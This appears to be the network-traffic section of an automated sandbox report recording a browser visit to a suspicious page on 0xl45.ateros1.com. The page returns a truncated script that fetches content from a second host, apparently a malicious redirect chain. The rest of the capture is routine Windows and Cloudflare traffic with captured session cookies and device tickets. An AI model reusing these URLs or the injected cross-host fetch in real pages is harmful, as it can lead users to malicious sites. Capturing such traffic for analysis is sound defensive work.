                  Mar 7, 2024 19:13:16.070696115 CET | 1.1.1.1 | 192.168.2.6 | 0xf09 | No error (0) | g461z.scharb9.com | | 172.67.133.193 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:16.070884943 CET | 1.1.1.1 | 192.168.2.6 | 0x3104 | No error (0) | g461z.scharb9.com | | | 65 | IN (0x0001) | false
                  Mar 7, 2024 19:13:16.760727882 CET | 1.1.1.1 | 192.168.2.6 | 0x8dc3 | No error (0) | a.nel.cloudflare.com | | 35.190.80.1 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:17.497559071 CET | 1.1.1.1 | 192.168.2.6 | 0x709f | No error (0) | g461z.scharb9.com | | 104.21.14.17 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:17.497559071 CET | 1.1.1.1 | 192.168.2.6 | 0x709f | No error (0) | g461z.scharb9.com | | 172.67.133.193 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:17.497946978 CET | 1.1.1.1 | 192.168.2.6 | 0xd212 | No error (0) | g461z.scharb9.com | | | 65 | IN (0x0001) | false
                  Mar 7, 2024 19:13:28.339660883 CET | 1.1.1.1 | 192.168.2.6 | 0x8039 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                  Mar 7, 2024 19:13:28.339660883 CET | 1.1.1.1 | 192.168.2.6 | 0x8039 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                  Mar 7, 2024 19:13:41.855375051 CET | 1.1.1.1 | 192.168.2.6 | 0x8a21 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                  Mar 7, 2024 19:13:41.855375051 CET | 1.1.1.1 | 192.168.2.6 | 0x8a21 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                  • 0xl45.ateros1.com
                  • https:
                    • g461z.scharb9.com
                  • a.nel.cloudflare.com
                  • fs.microsoft.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  0 | 192.168.2.6 | 49716 | 20.10.31.115 | 443
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:14 UTC | 71 | OUT
                  Data Ascii: CNT 1 CON 305MS-CV: bTqErBHdakOdzl9a.1Context: cc33979ba4e76aab
                  2024-03-07 18:13:14 UTC | 249 | OUT
                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:13:14 UTC | 1064 | OUT
                  Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: bTqErBHdakOdzl9a.2Context: cc33979ba4e76aab<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:13:14 UTC | 218 | OUT
                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: bTqErBHdakOdzl9a.3Context: cc33979ba4e76aab<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:13:14 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:13:14 UTC | 58 | IN
                  Data Ascii: MS-CV: jlL8cOA2BUmmpdnAruQTyg.0Payload parsing failed.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.6 | 49719 | 104.21.24.112 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:15 UTC | 673 | OUT | GET /OpLz16A1v5Gc/ HTTP/1.1
                  Host: 0xl45.ateros1.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  sec-ch-ua-platform: "Windows"
                  Upgrade-Insecure-Requests: 1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Sec-Fetch-Site: none
                  Sec-Fetch-Mode: navigate
                  Sec-Fetch-User: ?1
                  Sec-Fetch-Dest: document
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:15 UTC | 1118 | IN | HTTP/1.1 200 OK
                  Date: Thu, 07 Mar 2024 18:13:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: no-cache, private
                  Vary: Accept-Encoding
                  Access-Control-Allow-Origin: *
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 1; mode=block
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bil8UMMBybAvBQF1sRkQEUiRcyQkVW3U2optV3xBm4ZFHTL6fr1kA3bF12PuwM3ByKJ39h%2BI5Q%2Bi4rUthK6leCPzQ9BAZB7d4S41wbtvfyuChSH82W6L3dnR1gVM"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  alt-svc: h3=":443"; ma=86400
                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; expires=Thu, 07-Mar-2024 20:13:15 GMT; Max-Age=7200; path=/; secure; samesite=none
                  2024-03-07 18:13:15 UTC | 518 | IN
                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20
                  2024-03-07 18:13:15 UTC | 1369 | IN
                  Data Ascii: 19a0<style>body { margin: 0;}</style><script>fetch('https://g461z.scharb9.com/zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO', {method: "GET",}).then(response => {return response.text()}).then(
                  2024-03-07 18:13:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.6 | 49720 | 104.21.24.112 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:15 UTC | 1326 | OUT | GET /favicon.ico HTTP/1.1
                  Host: 0xl45.ateros1.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  sec-ch-ua-platform: "Windows"
                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                  Sec-Fetch-Site: same-origin
                  Sec-Fetch-Mode: no-cors
                  Sec-Fetch-Dest: image
                  Referer: https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20iLCJtYWMiOiJjMzQ2Zjc5NGYwZGRjOWVkYTE0M2VhMzViYWI0N2E5OGM3NTk0Y2NjZTFhYzIxYzYwNzJiYTE3MDUzMThlNzExIiwidGFnIjoiIn0%3D
                  2024-03-07 18:13:16 UTC | 719 | IN | HTTP/1.1 404 Not Found
                  Date: Thu, 07 Mar 2024 18:13:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 1; mode=block
                  Cache-Control: max-age=14400
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Vary: Accept-Encoding
                  alt-svc: h3=":443"; ma=86400
                  CF-Cache-Status: MISS
                  Server: cloudflare
                  CF-RAY: 860c8ef6f9d50ad1-LAS
                  2024-03-07 18:13:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.6 | 49724 | 104.21.14.17 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:16 UTC | 636 | OUT | GET /zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO HTTP/1.1
                  Host: g461z.scharb9.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  sec-ch-ua-platform: "Windows"
                  Accept: */*
                  Origin: https://0xl45.ateros1.com
                  Sec-Fetch-Site: cross-site
                  Sec-Fetch-Mode: cors
                  Sec-Fetch-Dest: empty
                  Referer: https://0xl45.ateros1.com/
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:17 UTC | 610 | IN | HTTP/1.1 200 OK
                  Date: Thu, 07 Mar 2024 18:13:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ayKxNgj9bvyl8bOtMq1HDQTA7J9tBEnH3IUzKFt0j4QPhph27xYB7cgkO25sdxU5pRdp7zapgQrS1Eec79DDkUS6KIXDz4GzWJ90v%2FemVnIX6WzxZ18SrSvVA85%2FNL0Z0sRDBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 860c8efb287909fd-LAS
                  alt-svc: h3=":443"; ma=86400
                  2024-03-07 18:13:17 UTC | 6 | IN | Data Raw: 31 0d 0a 31 0d 0a
                  Data Ascii: 11
                  2024-03-07 18:13:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  4 | 192.168.2.6 | 49725 | 35.190.80.1 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:17 UTC | 528 | OUT | OPTIONS /report/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Origin: https://0xl45.ateros1.com
                  Access-Control-Request-Method: POST
                  Access-Control-Request-Headers: content-type
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:17 UTC | 336 | IN | HTTP/1.1 200 OK
                  Content-Length: 0
                  access-control-max-age: 86400
                  access-control-allow-methods: OPTIONS, POST
                  access-control-allow-origin: *
                  access-control-allow-headers: content-length, content-type
                  date: Thu, 07 Mar 2024 18:13:17 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  5 | 192.168.2.6 | 49726 | 104.21.24.112 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:17 UTC | 1538 | OUT | GET /zrbeujxxwrlbp2Xcc8pe9gtxfIfDzptgdwgcganq?wgmtgxIEWEOYMIVPTWMRKCPMCVDZIDdmlrspzursjyptrxjszgoapjefpqcijsfinqcltjdepeyvk HTTP/1.1
                  Host: 0xl45.ateros1.com
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  sec-ch-ua-platform: "Windows"
                  Upgrade-Insecure-Requests: 1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Sec-Fetch-Site: same-origin
                  Sec-Fetch-Mode: navigate
                  Sec-Fetch-Dest: document
                  Referer: https://0xl45.ateros1.com/OpLz16A1v5Gc/
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  Cookie: XSRF-TOKEN=eyJpdiI6Ik5BUGN6SDNNYzdPOGgxS0lwalEvdnc9PSIsInZhbHVlIjoiRUZ3YWJmaExZTlBUS3B1MzArb2pqa0ZTUy9TZmVyZWVRd3p2WVRlOXU0ZVN3SysyOFRYcTBqbEc2dTRETjFhMFZGbXNGTVMyaFVFWVplWEltSTVDRUpnbGF3NnpkSkRNeGxIYXFWemIrd21IWTcraldmQjY1Z0Vaelpkb0VVV20iLCJtYWMiOiI1ZGUxMzAyN2JmMTQ5ZDg2Yzc1ZDhmZjczOTEwZDUyZTkzMmRmOTM4MzEyOTdlZjBiYzBmNzU5ZTY4YzI2NTZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9QaHdnVThJandQdlNqL21GT0NFZWc9PSIsInZhbHVlIjoiZytDU1FOMUhKQW9yemgxZlBRQkR0QjV0SVZFdkFEeTF0cm1iUzRpTmJSK04reDdhNU82SDUyeWRadjZiaGR5MjRMelZobjRsWEJ2YlpBaUxaanZxNUl3NWdwR1JidW9HaDA0M05lYmZ1YXlCeFFPMGluVVZ0TGJENWp5R0Q3Y20iLCJtYWMiOiJjMzQ2Zjc5NGYwZGRjOWVkYTE0M2VhMzViYWI0N2E5OGM3NTk0Y2NjZTFhYzIxYzYwNzJiYTE3MDUzMThlNzExIiwidGFnIjoiIn0%3D
                  2024-03-07 18:13:20 UTC | 669 | IN | HTTP/1.1 404 Not Found
                  Date: Thu, 07 Mar 2024 18:13:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 1; mode=block
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NM5r6%2FZtkafO6MpGWXbgV9cGGib0UWLI1OsgU5689mUc9sGO4YDxgSvSMaaJ%2BVpzyCAe%2F1hX6tGdUh77uTzh1duVbZUtorMoF2FEM0IX6zh2s4SR11lkDGQzXVl9"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  alt-svc: h3=":443"; ma=86400
                  Server: cloudflare
                  CF-RAY: 860c8f028f110a03-LAS
                  2024-03-07 18:13:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.6 | 49728 | 104.21.14.17 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:17 UTC | 428 | OUT | GET /zwcmghIEDEMrVvEVCJRSwZpKippePZEFBSPSZKDURQYGFVWTJPKMPXOYZGITHOQVPIZCCTZRZHKGWGZWJSYLSXO HTTP/1.1
                  Host: g461z.scharb9.com
                  Connection: keep-alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: */*
                  Sec-Fetch-Site: none
                  Sec-Fetch-Mode: cors
                  Sec-Fetch-Dest: empty
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:18 UTC | 614 | IN | HTTP/1.1 200 OK
                  Date: Thu, 07 Mar 2024 18:13:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Access-Control-Allow-Origin: *
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RWNneWw4ApjoFI8Hf86U4BJT8MSxEyt%2FCHWaywlAveIFMDKrCxAsJ6%2FFZdxgdYth%2FBhaM6wK0%2Bllgordl9q3lR8yg5VwHVugXTEwLQo7u78L3DWAk3GOS2YLaRZb0JLSzwSjMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 860c8f041bdc09f7-LAS
                  alt-svc: h3=":443"; ma=86400
                  2024-03-07 18:13:18 UTC | 6 | IN | Data Raw: 31 0d 0a 31 0d 0a
                  Data Ascii: 11
                  2024-03-07 18:13:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  7 | 192.168.2.6 | 49729 | 35.190.80.1 | 443 | 4176 | C:\Program Files\Google\Chrome\Application\chrome.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:18 UTC | 468 | OUT | POST /report/v3?s=BKNchjaKduOaB8sJz45qWJoyE%2Fi8uqglpBuFN55LneM77BfBRi0Ph863cnUMKAsUTiFWC7eSvWbUB5cmGAIlgaTm%2FDJZJzmyDXGmtQ6WJ%2FTsVPENOKAgO8tAvKqj HTTP/1.1
                  Host: a.nel.cloudflare.com
                  Connection: keep-alive
                  Content-Length: 437
                  Content-Type: application/reports+json
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2024-03-07 18:13:18 UTC | 437 | OUT | Data Ascii: [{"age":1,"body":{"elapsed_time":683,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://0xl45.ateros1.com/OpLz16A1v5Gc/","sampling_fraction":1.0,"server_ip":"104.21.24.112","status_code":404,"type":"http.error"},"type":"network
                  2024-03-07 18:13:18 UTC | 168 | IN | HTTP/1.1 200 OK
                  Content-Length: 0
                  date: Thu, 07 Mar 2024 18:13:17 GMT
                  Via: 1.1 google
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  8 | 192.168.2.6 | 49730 | 23.202.57.177 | 443
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:18 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  User-Agent: Microsoft BITS/7.8
                  Host: fs.microsoft.com
                  2024-03-07 18:13:18 UTC | 466 | IN | HTTP/1.1 200 OK
                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                  Content-Type: application/octet-stream
                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                  Server: ECAcc (sac/254A)
                  X-CID: 11
                  X-Ms-ApiVersion: Distribute 1.2
                  X-Ms-Region: prod-eus-z1
                  Cache-Control: public, max-age=90753
                  Date: Thu, 07 Mar 2024 18:13:18 GMT
                  Connection: close
                  X-CID: 2


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  9 | 192.168.2.6 | 49731 | 23.202.57.177 | 443
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:19 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                  Range: bytes=0-2147483646
                  User-Agent: Microsoft BITS/7.8
                  Host: fs.microsoft.com
                  2024-03-07 18:13:19 UTC | 520 | IN | HTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                  ApiVersion: Distribute 1.1
                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                  X-MSEdge-Ref: Ref A: CC1186E36C704BA5AF8177F229D6CC87 Ref B: PAOEDGE0621 Ref C: 2023-04-04T13:32:33Z
                  Cache-Control: public, max-age=90704
                  Date: Thu, 07 Mar 2024 18:13:19 GMT
                  Content-Length: 55
                  Connection: close
                  X-CID: 2
                  2024-03-07 18:13:19 UTC | 55 | IN | Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  10 | 192.168.2.6 | 49732 | 20.10.31.115 | 443
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:22 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: F4rIX5OeUkaesHHS.1Context: ddef68904bfc8779
                  2024-03-07 18:13:22 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:13:22 UTC | 1064 | OUT | Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: F4rIX5OeUkaesHHS.2Context: ddef68904bfc8779<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:13:22 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: F4rIX5OeUkaesHHS.3Context: ddef68904bfc8779<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:13:22 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:13:22 UTC | 58 | IN | Data Ascii: MS-CV: dOHNLn57zka+K09BzSzRCw.0Payload parsing failed.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  11 | 192.168.2.6 | 49735 | 20.10.31.115 | 443
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:13:36 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: g/bYc5OPiEmUHcRL.1Context: 145514837d6d86f1
                  2024-03-07 18:13:36 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:13:36 UTC | 1064 | OUT | Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: g/bYc5OPiEmUHcRL.2Context: 145514837d6d86f1<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
                  2024-03-07 18:13:36 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: g/bYc5OPiEmUHcRL.3Context: 145514837d6d86f1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                  2024-03-07 18:13:36 UTC | 14 | IN | Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                  Data Ascii: 202 1 CON 58
                  2024-03-07 18:13:36 UTC | 58 | IN | Data Ascii: MS-CV: 6JlS861C0UWLbURiXxLAhQ.0Payload parsing failed.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  12 | 192.168.2.6 | 49736 | 20.7.2.167 | 443
                  Timestamp | Bytes transferred | Direction | Data
                  2024-03-07 18:14:00 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: K3ojIMjMrEm4ZRi1.1Context: 4a79e7073ccc9114
                  2024-03-07 18:14:00 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                  2024-03-07 18:14:00 UTC | 1064 | OUT | Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: K3ojIMjMrEm4ZRi1.2Context: 4a79e7073ccc9114<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASI3r48Pz+d62MDbjb9mIN+KnqiMAFxYU7sPp8OvXjRMegFSHH8/WH5oQvkLO8QozSnK7A4+OR31C7BBQzErdsvOOFbsUgg5TnRAGvjDB6scmC
